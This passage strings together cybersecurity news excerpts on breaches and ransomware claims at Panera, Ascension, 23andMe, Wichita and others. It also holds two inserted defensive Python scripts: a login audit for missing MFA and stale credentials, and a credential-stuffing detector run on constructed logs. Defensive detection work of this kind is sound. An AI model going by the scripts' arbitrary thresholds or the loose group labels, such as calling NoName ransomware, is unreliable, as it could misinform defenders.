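    Login("carol", NOW - timedelta(minutes=10), "192.0.2.77", "PASSWORD", None, False),
]

# Constructed: when each user's password was last set (USERS.PASSWORD_LAST_SET_TIME).
PASSWORD_LAST_SET = {
    "svc_etl": NOW - timedelta(days=4 * 365),  # never rotated, like the four-year-old credentials Mandiant cited
    "alice": NOW - timedelta(days=20),
    "bob": NOW - timedelta(days=95),
    "carol": NOW - timedelta(days=5),
}

# Constructed allow list of trusted egress ranges and an assumed rotation window.
ALLOWED_NETWORKS = [ip_network("198.51.100.0/24")]
MAX_PASSWORD_AGE_DAYS = 90


def ip_allowed(ip: str, networks=ALLOWED_NETWORKS) -> bool:
    """True when the client address falls inside one of the trusted ranges."""
    addr = ip_address(ip)
    return any(addr in net for net in networks)


def audit_logins(logins, password_last_set, now=NOW,
                 max_age_days=MAX_PASSWORD_AGE_DAYS, networks=ALLOWED_NETWORKS):
    """Return a sorted list of (user, finding) pairs for successful logins.

    Findings are deduplicated per user so a noisy service account produces one
    line per control gap rather than one per session.
    """
    findings = set()
    for login in logins:
        if not login.is_success:
            continue  # failed attempts are not evidence of these three gaps
        if login.second_authentication_factor is None:
            findings.add((login.user_name, "single_factor_login"))
        if not ip_allowed(login.client_ip, networks):
            findings.add((login.user_name, "ip_outside_allow_list"))
        last_set = password_last_set.get(login.user_name)
        if last_set is None or (now - last_set) > timedelta(days=max_age_days):
            findings.add((login.user_name, "stale_credential"))
    return sorted(findings)


if __name__ == "__main__":
    for user, finding in audit_logins(SAMPLE_LOGINS, PASSWORD_LAST_SET):
        print(f"{user}: {finding}")
```

Run as a script it lists the service account three times (no MFA, address outside the allow list, credential four years old) and `bob` twice (no MFA, password over the window); `alice` is clean and `carol`'s failed attempt is skipped. On a real tenant the same three checks map to the controls in the list above: an authentication policy that requires MFA, a network policy bound to the account, and a rotation schedule for any user whose PASSWORD_LAST_SET_TIME predates it.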
Hacktivist Group Launches Alleged Cyberattack on Unifi TV, Targeting Malaysian Internet Infrastructure
177 Members Team Claims Unifi TV Cyberattack
The cyberattack on Unifi TV was aimed at disrupting the operation of the organization and highlighted the importance of robust cybersecurity measures in safeguarding critical digital infrastructure. Despite claims by the threat actor that the Unifi TV website was down, the web pages seem to be operational at the moment and don’t show any immediate sign of the cyberattack. The impact of the cyberattack extends beyond Unifi TV, affecting not only the telecommunications industry but also posing a threat to Malaysia's digital ecosystem as a whole. With the country witnessing over 3,000 cyber attacks daily, according to Defence Minister Datuk Seri Mohamed Khaled Nordin, the cyberattacks on Malaysia highlight the growing number of ransomware groups and hacktivist collectives targeting the nation.
Previous Cybersecurity Incidents
While Unifi TV has yet to release an official statement regarding the cyberattack, concerns about data breaches have been previously raised. In July 2023, Telekom Malaysia issued a data breach alert to Unifi users, stating that personal information, including names, identification numbers, and contact details, may have been compromised. The company assured users that measures had been taken to contain the breach and protect customer data. In light of these incidents, cybersecurity experts emphasize the need for proactive measures to mitigate future threats. Collaborative efforts between government agencies, law enforcement, and private sector entities are crucial in addressing online threats that target Asian nations. As for the current Unifi TV cyberattack claims, this is an ongoing story and The Cyber Express will be closely monitoring the situation. We’ll update this post once we have more information on the alleged attack or any official confirmation from the organization.
Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Panera Bread Hit by Ransomware: Data Breach, Outage, and Unanswered Questions
Panera Bread Data Breach: Impact on Employees and Operations
The ransomware attack has had substantial repercussions on Panera's operations and its employees. Many of Panera's virtual machine systems were reportedly encrypted during the attack, leading to a significant outage that crippled internal IT systems, phones, point of sale systems, the company’s website, and mobile apps. During this outage, employees were unable to access their shift details and had to contact their managers to obtain work schedules. The stores faced further disruption as they could only process cash transactions, with electronic payment systems down. Additionally, the rewards program system was inoperable, preventing members from redeeming their points. The most concerning aspect of the breach for employees is the compromise of sensitive personal information. Panera has confirmed that files containing employee names and Social Security numbers were accessed. There is also the potential that other employment-related information was compromised. However, the company has assured employees that, as of the notification date, there is no evidence that the accessed information has been publicly disseminated. To mitigate the potential impact on affected individuals, Panera is offering a one-year membership to CyEx's Identity Defense Total, which includes credit monitoring, identity detection, and identity theft resolution services. This proactive measure aims to help employees safeguard their identities and respond swiftly to any signs of fraudulent activity.
The Bigger Picture: Unanswered Questions
Despite the detailed notifications to employees, Panera has yet to publicly disclose the total number of individuals impacted by the breach. The identity of the threat actors behind the ransomware attack also remains unknown. No ransomware group has claimed responsibility, which raises speculation that the attackers might be awaiting a ransom payment or have already received it. Moreover, Panera has not responded to requests for comment from The Cyber Express regarding the outage and the ransomware attack. This lack of communication leaves several critical questions unanswered, particularly about the measures being taken to prevent future incidents and the ongoing efforts to recover from the current breach.
Implications for Panera Bread Data Breach
The implications of this ransomware attack extend beyond the immediate disruption and data breach. Panera Bread's reputation is at stake, as customers and employees alike may question the company's ability to protect sensitive information. The operational disruptions also highlight vulnerabilities in the company’s IT infrastructure that need to be addressed to prevent similar incidents in the future. In response to the data breach, Panera has committed to enhancing its existing security measures. The company is likely to conduct a thorough review of its cybersecurity policies and practices to identify and address any gaps. Additionally, ongoing communication with employees and stakeholders will be crucial in rebuilding trust and ensuring that all affected parties are adequately supported. As the investigation continues, further details may emerge about the nature of the breach and the steps Panera is taking to strengthen its defenses.
Truist Bank Data Allegedly Up for Sale on Dark Web: Employee Info, Transactions Exposed
Truist Bank Data Breach Allegedly Goes on Sale on Dark Web
According to the threat actor’s post, the Truist Bank data is being offered for $1 million. The compromised data allegedly includes details of 65,000 employees, bank transactions containing names, account numbers, and balances, and the source code for IVR funds transfers. The post by the threat actor provides specific information about the data for sale and contact details for purchase. Additionally, the post includes various usernames, threads, reputation points, and contact information such as XMPP handles and email addresses associated with the threat actor. Meanwhile, Kulicke and Soffa Industries, a renowned semiconductor and electronics manufacturing company, disclosed a breach compromising millions of files. Initially detected on May 12, 2024, the breach exposed critical data, including source code, engineering information, and personally identifiable information.
Two Cybersecurity Incidents at Once
In response to the Kulicke and Soffa data breach, K&S swiftly initiated containment measures in collaboration with cybersecurity experts and law enforcement agencies. The company's cybersecurity team worked diligently to isolate affected servers and prevent further intrusion. Despite the breach, K&S remains committed to safeguarding its systems and data integrity. In a filing with the U.S. Securities and Exchange Commission (SEC), K&S detailed its efforts to mitigate the impact of the breach. The company assured stakeholders that, as of the filing date, the incident had not materially disrupted its operations. However, investigations are ongoing to ascertain the full extent of the breach and strengthen the cybersecurity measures in place. The Truist Bank data breach and the Kulicke and Soffa cyber incident highlight the persistent threat of cyberattacks faced by organizations worldwide. While both entities are actively addressing the breaches, the incidents underline the broader importance of cybersecurity measures in safeguarding sensitive information and maintaining trust in the digital age.
Life360 Targeted in Extortion Attempt, Customer Data Exposed
About Tile and Life360
Tile, much like Apple's AirTag, produces small Bluetooth-enabled devices that help users locate and track items such as keys, wallets, and bags. These devices work in conjunction with a mobile app, allowing users to find lost items using sound alerts or by viewing the last known location of the Tile tracker on a map. Tile is a subsidiary of Life360, the leading connection and safety app used by one in nine U.S. families. With over 66 million members, Life360 offers driving, location, and digital safety features that keep loved ones connected. The app's extensive user base makes the implications of any data breach potentially far-reaching.
Implications of the Life360 Data Breach
While the Life360 data breach did not include highly sensitive data, the exposure of personal information such as names, addresses, and phone numbers can still have significant implications. Such data can be used for targeted phishing attacks, identity theft, and other malicious activities. The breach highlights the importance of cybersecurity measures, particularly for companies managing large databases of personal information. Life360's swift response to the incident and its cooperation with law enforcement demonstrate the company's commitment to transparency and user security.
Moving Forward
In response to the breach, Life360 has reiterated its commitment to enhancing its security infrastructure and safeguarding user information. The company is taking proactive steps to prevent future cybersecurity incidents, including strengthening its cybersecurity protocols and continuing to monitor its systems for potential vulnerabilities. "We remain committed to keeping families safe online and in the real world," Hulls emphasized. The company’s prompt action and transparent communication are crucial in maintaining user trust and addressing concerns related to the breach.
Single Click, Big Disruption: Employee Download Triggers Ascension Cyberattack
What Caused Ascension Cyberattack?
The cyberattack on Ascension was traced back to an innocent mistake by an employee who accidentally downloaded a malicious file, mistaking it for a legitimate one. "We have also identified how the attacker gained access to our systems. An individual working in one of our facilities accidentally downloaded a malicious file that they thought was legitimate. We have no reason to believe this was anything but an honest mistake," informed the spokesperson. This incident highlights the importance of continuous cybersecurity training and vigilance among all employees to prevent such occurrences in the future. Ascension has assured its patients and associates that there is no evidence suggesting any data was taken from the Electronic Health Records (EHR) system or other clinical systems where comprehensive patient records are securely stored. This means the most sensitive health information remains uncompromised, providing some relief amidst the ongoing investigation.
Ongoing Review and Protective Measures
Ascension is currently conducting a detailed review and analysis of the potentially impacted files to determine precisely what data was affected and identify the individuals involved. This meticulous process is expected to take considerable time due to the volume and complexity of the data. In the meantime, Ascension is taking proactive steps to protect its patients and associates. The healthcare provider is offering free credit monitoring and identity theft protection services to all patients and associates, regardless of whether their data is eventually found to be compromised. This service is intended to provide immediate peace of mind and mitigate potential risks from the Ascension data breach. Individuals who wish to enroll in these protective services are encouraged to contact Ascension's dedicated call center at 1-888-498-8066.
Commitment to Transparency and Legal Compliance
Ascension remains committed to transparency throughout this investigation. While specific details regarding whether an individual's data was affected cannot be provided, Ascension pledges to follow all applicable laws and regulations related to data breach notifications. "We encourage all Ascension patients and staff who are concerned to take advantage of these services. We want to be clear that this offer does not mean we have determined that any specific individual patient’s data has been compromised. Rather, it illustrates our desire to do everything possible to reassure our patients and associates, regardless of any impact to specific individuals’ data," the spokesperson explained. "Once our data analysis is complete, we are committed to following all applicable laws and regulations to notify affected individuals and the appropriate regulatory bodies. To our patients, associates, and the communities we serve, we regret any disruption or concern you may have experienced as a result of this incident," the spokesperson added.
Background and Impact of Cyberattack on Ascension
On May 10, The Cyber Express reported that Ascension faced disruptions in clinical operations due to a cyberattack that prompted the organization to take some of its systems offline. Operating in 19 states and the District of Columbia, Ascension oversees 140 hospitals and 40 senior care facilities. It also boasts a significant workforce of 8,500 providers, 35,000 affiliated providers, and 134,000 associates. In 2023, Ascension’s total revenue amounted to $28.3 billion. Given its substantial revenue and widespread operations, the impact of this cyberattack was significant. The organization detected unusual activity on select technology network systems, prompting an immediate response, investigation initiation, and activation of remediation efforts. Due to the cyberattack, Ascension advised its business partners to temporarily sever connections to its systems as a precautionary measure and stated it would notify partners when it is safe to reconnect. The cyberattack on Ascension disrupted clinical operations, prompting an investigation into the extent and duration of the disruption.
City of Moreton Bay Investigates Data Breach After Resident Discovered Leak of Private Information
Data Breach Discovered By Local Resident
City of Moreton Bay resident Piper Lalonde, who works as a data analyst, discovered the breach along with her husband. They were shocked to learn that their personal information was freely available on the council's customer request online portal. The couple discovered that the information included their phone numbers, complaints, and requests that they had made for new bins, along with the GPS coordinates of where the requests had been filed. A further search revealed that the personal information of some of their friends and neighbors, who were fellow ratepayers, was also available in the records. Piper reported this information to the council, and the website was taken down the next day. However, she was still unsatisfied with the lack of notification about the incident to impacted residents. Piper stated, "I would expect they'd have to send out some formal communication letting people know their information was publicly accessible, but there was no indication they were going to do that." She expressed concern about the possibility of people stumbling upon complaints made about them by other residents. She added, "If this gets in the wrong hands — it just takes one person to see a complaint about them, and who knows what they'll do."
City of Moreton Bay Responses to Data Breach
After Piper's report, the website was said to have been taken down. The site appears to be functional as of now, with some functions still limited. The website includes an official notice in response to the incident.
Source: moretonbay.qld.gov.au
"We are experiencing system difficulties with our customer request portal. Our third-party provider is investigating a possible information breach. The cause is yet to be determined but there is no indication this is a cyber attack. We will never contact you via unsolicited calls to request sensitive information. No action is required from you at this stage. We will continue to keep you informed."
The notice appears to indicate that the breach stemmed from a third-party provider. The Cyber Express team has reached out to the Moreton Bay Council's Privacy Officer for further information on the breach; however, no response has been received as of publication time. The potential scale of the data breach, as well as its impact on residents, is currently unknown. It is also unclear how many individuals may have accessed the available data before the website was temporarily taken down and subsequently limited.
Medusa Ransomware Group Claims Cyberattack on Organizations in USA, Canada
MEDUSA Ransomware Attack: The Latest Victims
GEMCO Constructors is headquartered in Indianapolis, Indiana, USA. The ransomware actors have claimed to have access to 1.0 TB of the organization's data and have threatened to publish it within 6-7 days. The second company that the group has claimed to have targeted is Dynamo, which is based in Saskatchewan, Canada. Data of the company, which specializes in electrical and electronic manufacturing, has allegedly been compromised. MEDUSA has claimed to have exfiltrated 149.6 GB of the organization's data and plans to publish it within 6-7 days. Farnell Packaging, a Canadian company in the packaging and container industry, has also allegedly been attacked. The attackers claimed to have accessed 193.9 GB of the organization's data and warned the data would be published within 8-9 days. Despite the gigantic claims made by the ransomware group, the official websites of the targeted companies seem to be fully operational, with no signs of foul play. The organizations, however, have not yet responded to the alleged cyberattack, leaving the claims made by the ransomware group unverified. This article will be updated once the respective organizations respond to the claims. The absence of confirmation raises the question of the authenticity of the ransomware claim. It remains to be seen whether it is a tactic employed by MEDUSA to garner attention or if there are ulterior motives attached to their actions. Only an official statement by the affected companies can shed light on the true nature of the situation. However, if the claims made by the MEDUSA ransomware group do turn out to be true, then the consequences could be far-reaching. The potential leak of sensitive data could pose a significant threat to the affected organizations and their employees.
Background of MEDUSA Ransomware Group
MEDUSA first burst onto the scene in June 2021 and has since targeted organizations in various countries across multiple industries, including healthcare, education, manufacturing, and retail. Most of the targeted companies, though, are based in the United States of America. MEDUSA functions as a Ransomware-as-a-Service (RaaS) platform. It provides would-be attackers with the malicious software and infrastructure required to carry out disruptive ransomware attacks. The ransomware group also has a public Telegram channel that threat actors use to post data they claim to have stolen, which could be an attempt to extort organizations and demand payment.
Previous Ransomware Attacks
Less than three weeks ago, MEDUSA ransomware group claimed a cyberattack on Comwave, a Canadian communications giant renowned for providing internet, network security solutions, and customer support services. In January 2024, a prominent non-profit organization, Water For People, was targeted by the group. The organization faced the pressure of a deadline to comply with the demands of the ransomware group. MEDUSA also targeted four organizations across different countries, including France, Italy, and Spain. The group’s modus operandi remains uniform, with announcements being made on their dark web forum accompanied by deadlines and ransom demands. As organizations deal with the fallout of cyberattacks by groups like MEDUSA, it becomes crucial to remain vigilant and implement stringent security measures.
UK and Canada Privacy Watchdogs Probe 23andMe Data Breach
Focus of 23andMe Data Breach Investigation
The joint investigation will examine three key aspects:
- Scope of Information Exposed: The breadth of data affected by the breach and the potential harm to individuals arising from it.
- Security Measures: Whether 23andMe had adequate safeguards to protect the sensitive information under its control.
- Breach Notification: Whether the company provided timely and adequate notification to the regulators and affected individuals, as mandated by Canadian (PIPEDA) and UK (GDPR) data protection laws.
“People need to trust that any organization handling their most sensitive personal information has the appropriate security and safeguards in place. This data breach had an international impact, and we look forward to collaborating with our Canadian counterparts to ensure the personal information of people in the UK is protected.”
Dufresne, on the other hand, highlighted the risks of genetic information falling into the wrong hands. He said:
“In the wrong hands, an individual’s genetic information could be misused for surveillance or discrimination. Ensuring that personal information is adequately protected against attacks by malicious actors is an important focus for privacy authorities in Canada and around the world.”
The data protection and privacy laws in the UK and Canada allow such joint investigations on matters that impact both jurisdictions. Each regulator will assess compliance with the relevant laws they oversee. Neither of the privacy commissioner offices, however, provided further details on how they would charge or penalize 23andMe if found in violation of GDPR or PIPEDA. “No further comment will be made while the investigation is ongoing,” the UK ICO said.
23andMe acknowledges the joint investigation announced by the Privacy Commissioner of Canada and the UK Information Commissioner today.
“We intend to cooperate with these regulators’ reasonable requests relating to the credential stuffing attack discovered in October 2023,” a 23andMe spokesperson told The Cyber Express.
Genetic Testing Company 23andMe Data Breach Timeline
23andMe first disclosed details of the October data breach in an 8-K filing with the U.S. Securities and Exchange Commission. The genetic testing company said attackers scraped profiles of 23andMe users who opted in to using the company’s DNA Relatives feature. This profiling feature connects users with distant genetic relatives - other 23andMe users who share bits of their DNA. The attackers used credential stuffing attacks that affected 0.1% of user accounts, the company told the SEC. Using these accounts as a launchpad, hackers were able to access “a significant number of files containing profile information about other users' ancestry.” Threat actors claimed on underground forums that they were able to siphon “20 million pieces of code” from 23andMe. The claimed data set included information on the DNA ancestry backgrounds of more than 1.3 million Ashkenazi Jewish and Chinese users. By the end of October, another threat actor claimed compromise of 4 million genetic profiles, which the company also investigated. The genetic testing company 23andMe said it notified the affected 6.9 million users - 5.5 million DNA Relatives profiles and 1.4 million Family Tree profiles - in December. The company told federal regulators that the data breach incident was set to incur between $1 million and $2 million in one-time expenses. The company faces at least 30 class action lawsuits in U.S. state and federal jurisdictions as well as in Canada. 23andMe blamed the customers’ poor security hygiene for the breach and has since made two-step verification a prerequisite for account logon. It also mandated customers to reset their passwords. *Update 1 (June 12 – 12:00 AM EST): Added response from the 23andMe spokesperson.
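Credential stuffing, the technique named in the 23andMe filing above, replays username/password pairs leaked from other breaches, so a single source typically fails against many distinct accounts while a small fraction of attempts succeed. The script below is an added illustration of how a defender can surface that pattern in authentication logs; it is not code from 23andMe or The Cyber Express. The log format, the thresholds, the IP addresses and the sample log lines are all constructed for this example.

```python
"""Flag credential-stuffing patterns in authentication logs (added example).

Heuristic: within a sliding time window, a single source IP that fails
against many DISTINCT accounts with a low success ratio looks like a
stuffing tool, whereas a legitimate user retyping a password fails against
one account. Log format, thresholds and sample lines are constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional

# Constructed log format: "<ISO timestamp> auth src=<ip> user=<name> result=<ok|fail>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth src=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


@dataclass
class Event:
    ts: datetime
    ip: str
    user: str
    ok: bool


def parse_line(line: str) -> Optional[Event]:
    """Parse one constructed log line; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Event(datetime.fromisoformat(m["ts"]), m["ip"], m["user"], m["result"] == "ok")


def detect_stuffing(
    lines: Iterable[str],
    window: timedelta = timedelta(minutes=10),
    min_users: int = 5,
    max_success_ratio: float = 0.2,
) -> Dict[str, Dict[str, int]]:
    """Return {ip: {"users", "fails", "successes"}} for suspicious sources.

    A source is flagged if, inside any `window` of its activity, it fails
    against at least `min_users` distinct accounts while its success ratio
    stays at or below `max_success_ratio`. The reported numbers come from the
    qualifying window that spans the most distinct failed accounts.
    """
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e.ts)
    by_ip: Dict[str, List[Event]] = defaultdict(list)
    for e in events:
        by_ip[e.ip].append(e)

    flagged: Dict[str, Dict[str, int]] = {}
    for ip, evs in by_ip.items():
        best: Optional[Dict[str, int]] = None
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it fits inside `window`.
            while evs[end].ts - evs[start].ts > window:
                start += 1
            window_evs = evs[start:end + 1]
            failed_users = {e.user for e in window_evs if not e.ok}
            successes = sum(1 for e in window_evs if e.ok)
            ratio = successes / len(window_evs)
            if len(failed_users) >= min_users and ratio <= max_success_ratio:
                stats = {"users": len(failed_users),
                         "fails": len(window_evs) - successes,
                         "successes": successes}
                if best is None or stats["users"] > best["users"]:
                    best = stats
        if best is not None:
            flagged[ip] = best
    return flagged


# Constructed sample: one source spraying eight accounts (one hit), and one
# ordinary user who mistypes a password twice before logging in.
SAMPLE_LOG = """
2023-10-01T08:00:01 auth src=203.0.113.7 user=u001 result=fail
2023-10-01T08:00:02 auth src=203.0.113.7 user=u002 result=fail
2023-10-01T08:00:03 auth src=203.0.113.7 user=u003 result=fail
2023-10-01T08:00:04 auth src=203.0.113.7 user=u004 result=ok
2023-10-01T08:00:05 auth src=203.0.113.7 user=u005 result=fail
2023-10-01T08:00:06 auth src=203.0.113.7 user=u006 result=fail
2023-10-01T08:00:07 auth src=203.0.113.7 user=u007 result=fail
2023-10-01T08:00:08 auth src=203.0.113.7 user=u008 result=fail
2023-10-01T08:01:00 auth src=198.51.100.4 user=alice result=fail
2023-10-01T08:01:20 auth src=198.51.100.4 user=alice result=fail
2023-10-01T08:01:40 auth src=198.51.100.4 user=alice result=ok
""".strip().splitlines()


def run_example() -> Dict[str, Dict[str, int]]:
    """Run the detector over the constructed sample and return the flagged sources."""
    return detect_stuffing(SAMPLE_LOG)


if __name__ == "__main__":
    for ip, stats in run_example().items():
        print(f"{ip}: {stats['users']} distinct accounts failed, "
              f"{stats['successes']} succeeded")
```

The success ratio is what separates this from a plain brute-force alert: a handful of successes among many failures is the signature of replayed leaked credentials, and those few successful accounts are the ones to force through a password reset and second-factor enrolment, which is the remediation 23andMe applied.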
City of Wichita Recovers from Cyberattack: Water Services Back Online, More Progress Expected
City of Wichita Cyberattack Update
Water Services Restored
Customers can expect to receive updated statements this week. Auto-payments have resumed normal operations, and customers now have full access to their utility accounts online. Bills can be paid by credit card, cash, check, and money order at City Hall, online at the City's payment portal, by calling (316) 265-1300, or through the mail. Due to the cyberattack on the City of Wichita, some June bills may cover more than 60 days of service. Customers needing help with these bills are encouraged to contact a representative at (316) 265-1300 to arrange a payment plan.
Library Services Update
The Wichita Public Library has also seen progress, though some services remain affected. Public Wi-Fi is available at all locations, and patrons can access Libby for eBooks, audiobooks, and digital magazines. Additionally, materials can be checked in and out manually. However, hold requests and renewals, customer account information, the online catalog, the automated materials handler at the Advanced Learning Library, and online databases like Kanopy and LinkedIn Learning are still unavailable.
Airport and Court Systems
At the Wichita Dwight D. Eisenhower National Airport, public flight and gate display information is not yet available online but is expected to be restored soon. The Municipal Court has made strides in recovery, with most systems operational. The public search of warrants is anticipated to be online by Monday, June 10. The City’s Information Technology team is working to fix the remaining system outages. The city appreciates residents' patience as there may be occasional service interruptions during ongoing recovery efforts.
What Happened During the City of Wichita Cyberattack
The Cyber Express reported that the cyberattack occurred on May 5, leading to the shutdown of several online city services, including water bill payments, some city-building Wi-Fi, and electronic payments. LockBit, a known ransomware group, claimed responsibility for the cyberattack. This followed an earlier notification from the City of Wichita regarding a ransomware incident, although the responsible group was not initially disclosed. The ransomware attack exposed vulnerabilities in the city's IT systems and underscored the importance of strong cybersecurity measures. Despite the challenges, the city has worked hard to restore essential services to its residents. The City of Wichita urges residents to stay informed through official updates and to reach out to the provided contact points for help. The city remains committed to being transparent and providing the necessary support to its residents during this recovery period.
Findlay Automotive Hit by Cybersecurity Attack, Investigation Ongoing
Operational Impact of Findlay Automotive Cybersecurity Issue
Despite the restrictions imposed by the Findlay Automotive cybersecurity issue, all dealership locations remain open. Customers with vehicles currently in service are encouraged to visit or contact their respective service departments directly for assistance from Findlay’s dedicated staff. "At Findlay Automotive, we have been serving our communities with pride and integrity since 1961," reads the company’s Facebook post. "We take our responsibility to our customers and the community very seriously. We will continue to provide updates as the investigation continues and more information becomes available.” The urgency and gravity of the situation are highlighted by recent trends in cybersecurity, particularly the rising threat of ransomware attacks in the industrial sector.
Rising Cyber Threats in the Industrial Sector
In 2019, industrial companies faced significant financial burdens due to ransomware, collectively paying out $6.9 million, which accounted for 62% of the total $11 million spent on ransomware that year. Despite representing only 18% of ransomware cases, the manufacturing sector bore the brunt of the financial impact. By 2020, the cross-industry cost of ransomware had escalated to a staggering $20 billion. Gartner, a research firm, has projected that by 2023, the financial repercussions of cyberattacks on industrial systems, including potential fatal casualties, could exceed $50 billion. The automotive sector, in particular, has become a prime target for cybercriminals. As these threats intensify, paying ransoms becomes an increasingly weak response, emphasizing the necessity of enhanced cybersecurity measures to protect assets. The recent Volkswagen incident exemplifies the magnitude of these threats. In April 2024, Volkswagen faced a cyberattack, suspected to originate from Chinese hackers. The breach exposed sensitive data, including development plans for gasoline engines and critical information on e-mobility initiatives. Investigations by ZDF Frontal and “Der Spiegel” revealed more than 40 internal documents, highlighting the severity of the cyberattack. Similarly, in February 2024, Thyssenkrupp's automotive unit in Duisburg, Germany, experienced a cyberattack that disrupted production in its car parts division. Although no data theft or manipulation was detected, the company had to take several systems offline to prevent further unauthorized access, underlining the operational risks posed by such cyber incidents. Closer to home, Eagers Automotive Limited faced a cyber incident on December 27, 2023, leading to a temporary trading halt to address its continuous disclosure obligations. The company issued an apology to its customers for the inconvenience caused by the disruption, reflecting the broad and often immediate impact of cyberattacks on automotive businesses.
Findlay Automotive’s proactive response to the current cybersecurity issue demonstrates its commitment to safeguarding its operations and customer trust. The company is maintaining open lines of communication with customers, providing regular updates as the investigation progresses and more information becomes available.
NoName Ransomware Claims Yet Another Attack on Germany after Ukraine President’s Visit
Previous Instances of NoName Ransomware Attacks
Since first emerging on the dark web in March 2022, shortly after Russia’s invasion of Ukraine, the pro-Russian hacker group NoName has been increasingly active. The group has taken responsibility for a series of cyberattacks targeting government agencies, media outlets, and private companies across Ukraine, the United States, and Europe. Before making the claim of targeting German websites, NoName had a history of targeting prominent organizations in other countries. In April 2024, the group allegedly launched a cyberattack on Moldova, affecting key government websites such as the Presidency, Ministry of Foreign Affairs, Ministry of Internal Affairs, and the State Registry. These websites were rendered inaccessible, displaying the message, “This Site Can’t be Reached.” The attack hinted at a politically motivated agenda, though NoName did not explicitly disclose their motives. In March 2024, NoName targeted multiple websites in Denmark, including significant entities like Movia, Din Offentlige Transport, the Ministry of Transport, Copenhagen Airports, and Danish Shipping. Similarly, in January 2024, the group attacked high-profile websites in the Netherlands, including OV-chipkaart, the Municipality of Vlaardingen, the Dutch Tax Office (Belastingdienst), and GVB. More recently, NoName’s cyber onslaught on Finland raised further alarms. Finnish government organizations, including Traficom, the National Cyber Security Centre Finland (NCSC-FI), The Railways, and the Agency for Regulation and Development of Transport and Communications Infrastructure, faced temporary inaccessibility due to DDoS attacks. The ongoing cyberattacks by NoName across several countries serve as a reminder of the perils of the digital landscape. The operations of NoName ransomware, combined with their alleged political motives, highlight the urgent need for enhanced cybersecurity measures and international cooperation.
The cybersecurity community must remain vigilant and proactive in protecting digital infrastructure from such malicious actors.
Ascension Makes Progress in Restoring Systems After Cyberattack, Patients to See Improved Wait Times
Ascension Cyberattack: What Has Been Restored?
According to the latest update on the Ascension cyberattack, officials have successfully restored EHR access in the Florida, Alabama, Tennessee, Maryland, Central Texas (Ascension Seton and Dell Children's hospitals), and Oklahoma markets. Ascension Via Christi further stated that its hospitals, including St. Francis and St. Joseph hospitals, and Ascension Medical Group clinics in Wichita, have restored the primary technology used for electronic patient documentation in care settings. "This will allow most hospital departments, physician offices, and clinics to use electronic documentation and charting. Patients should see improved efficiencies and shorter wait times. Our team continues to work tirelessly to restore other ancillary technology systems," Ascension Via Christi explained on its website, providing cybersecurity updates for its Kansas facilities.
Source: Ascension Via Christi Website
The update for Ascension Via Christi St. Francis followed a national update from Ascension, which reported continued progress in restoring systems across its network. The company aims to have systems fully restored across its ministry by Friday, June 14.
Ascension Cyberattack: What Happened?
On May 10, The Cyber Express reported that Ascension faced disruptions in clinical operations due to a cyberattack that prompted the organization to take some of its systems offline. Operating in 19 states and the District of Columbia, Ascension oversees 140 hospitals and 40 senior care facilities. It also boasts a significant workforce of 8,500 providers, 35,000 affiliated providers, and 134,000 associates. In 2023, Ascension’s total revenue amounted to $28.3 billion. Given its substantial revenue and widespread operations, the impact of this cyberattack was significant. The organization detected unusual activity on select technology network systems, prompting an immediate response, investigation initiation, and activation of remediation efforts. Consequently, access to certain systems has been interrupted during the ongoing investigation process. Due to the massive cyberattack, Ascension advised its business partners to temporarily sever connections to its systems as a precautionary measure and stated it would notify partners when it is safe to reconnect. The cyberattack on Ascension disrupted clinical operations, prompting an investigation into the extent and duration of the disruption.
Hawk Eye App Data Breach in India: Police Credit The Cyber Express for Exclusive Leads to Arrest Hacker
Background of Hawk Eye App Data Breach
The Hawk Eye App was launched by the Telangana Police in December 2014 for both Android and iPhone users as part of its initiative to become a citizen-friendly and responsive police force. Denizens were encouraged to use the app to report on a wide range of activities, including traffic violations, passing on information about criminals, violations by police, and crime against women, and also to pass on suggestions to the lawmen for improved policing and to credit the good work done by them. A key feature of the app is the SOS button for accessing help in case of emergencies. On May 29, 2024, a threat actor, who goes by the name “Adm1nFr1end”, revealed that he had breached the Hawk Eye app. He shared that the stolen database had sensitive data of over 200,000 citizens, including their Personally Identifiable Information (PII), names, email addresses, phone numbers, physical addresses, IMEI numbers, and location coordinates. The threat actor had posted samples of the data breach on hacking website BreachForums and was selling this compromised data for USD $150.
Source: X
Arrest of Hawk Eye App Data Breach Hacker
In the aftermath of the news report published on this website, the Telangana Police registered a suo moto case on June 4. “We have registered a case and are investigating the hacking allegations and suspected data breach,” said Telangana Cyber Security Bureau (TGCSB) Director Shikha Goel. On June 9, the Telangana Police reported that its Cyber Security Bureau had apprehended a hacker involved in the Hawk Eye app data breach. “Acting swiftly, the TGCSB investigators travelled to Delhi, where they identified and arrested the hacker, who had claimed to have posted the compromised data on a public platform for a price,” the police said in a statement. Sharing details of the arrest, Director General of Police of Telangana Police, Ravi Gupta, who is the top cop of the state, said that the police had used advanced tools to successfully unveil the hacker's identity. He, however, refrained from elaborating on the techniques used to arrest the hacker to ensure secrecy. “The hacker had posted details of the breach on databreachforum.st, offering the compromised data for sale at $150 USD. He provided the Telegram IDs “Adm1nfr1end” and “Adm1nfr1ends” for interested buyers to contact him regarding the Hawk Eye data,” Ravi said. The alleged hacker was identified as Jatin Kumar, a 20-year-old student and a resident of Greater Noida, a prominent suburb in Delhi's National Capital Region. The police also shared that he had been arrested earlier in a case of cybersecurity fraud. (This is Part 1 of the article; Part 2 covers more about the hacker, why he was selling the data and how the police tracked him down.)
Hacker Claims Cyberattack on China’s Massive Power Grid SGCC, Selling Stolen Data
Potential Implications of Cyberattack on SGCC
Established on December 29, 2002, SGCC is the largest utility company in the world and consistently ranks second on the Fortune Global 500 list. SGCC operates as a group with RMB 536.3 billion in registered capital and employs 1.72 million people. It provides power to over 1.1 billion people across 26 provinces, autonomous regions, and municipalities, covering 88% of China's national territory. Additionally, SGCC owns and operates overseas assets in countries such as the Philippines, Brazil, Portugal, Australia, and Italy.
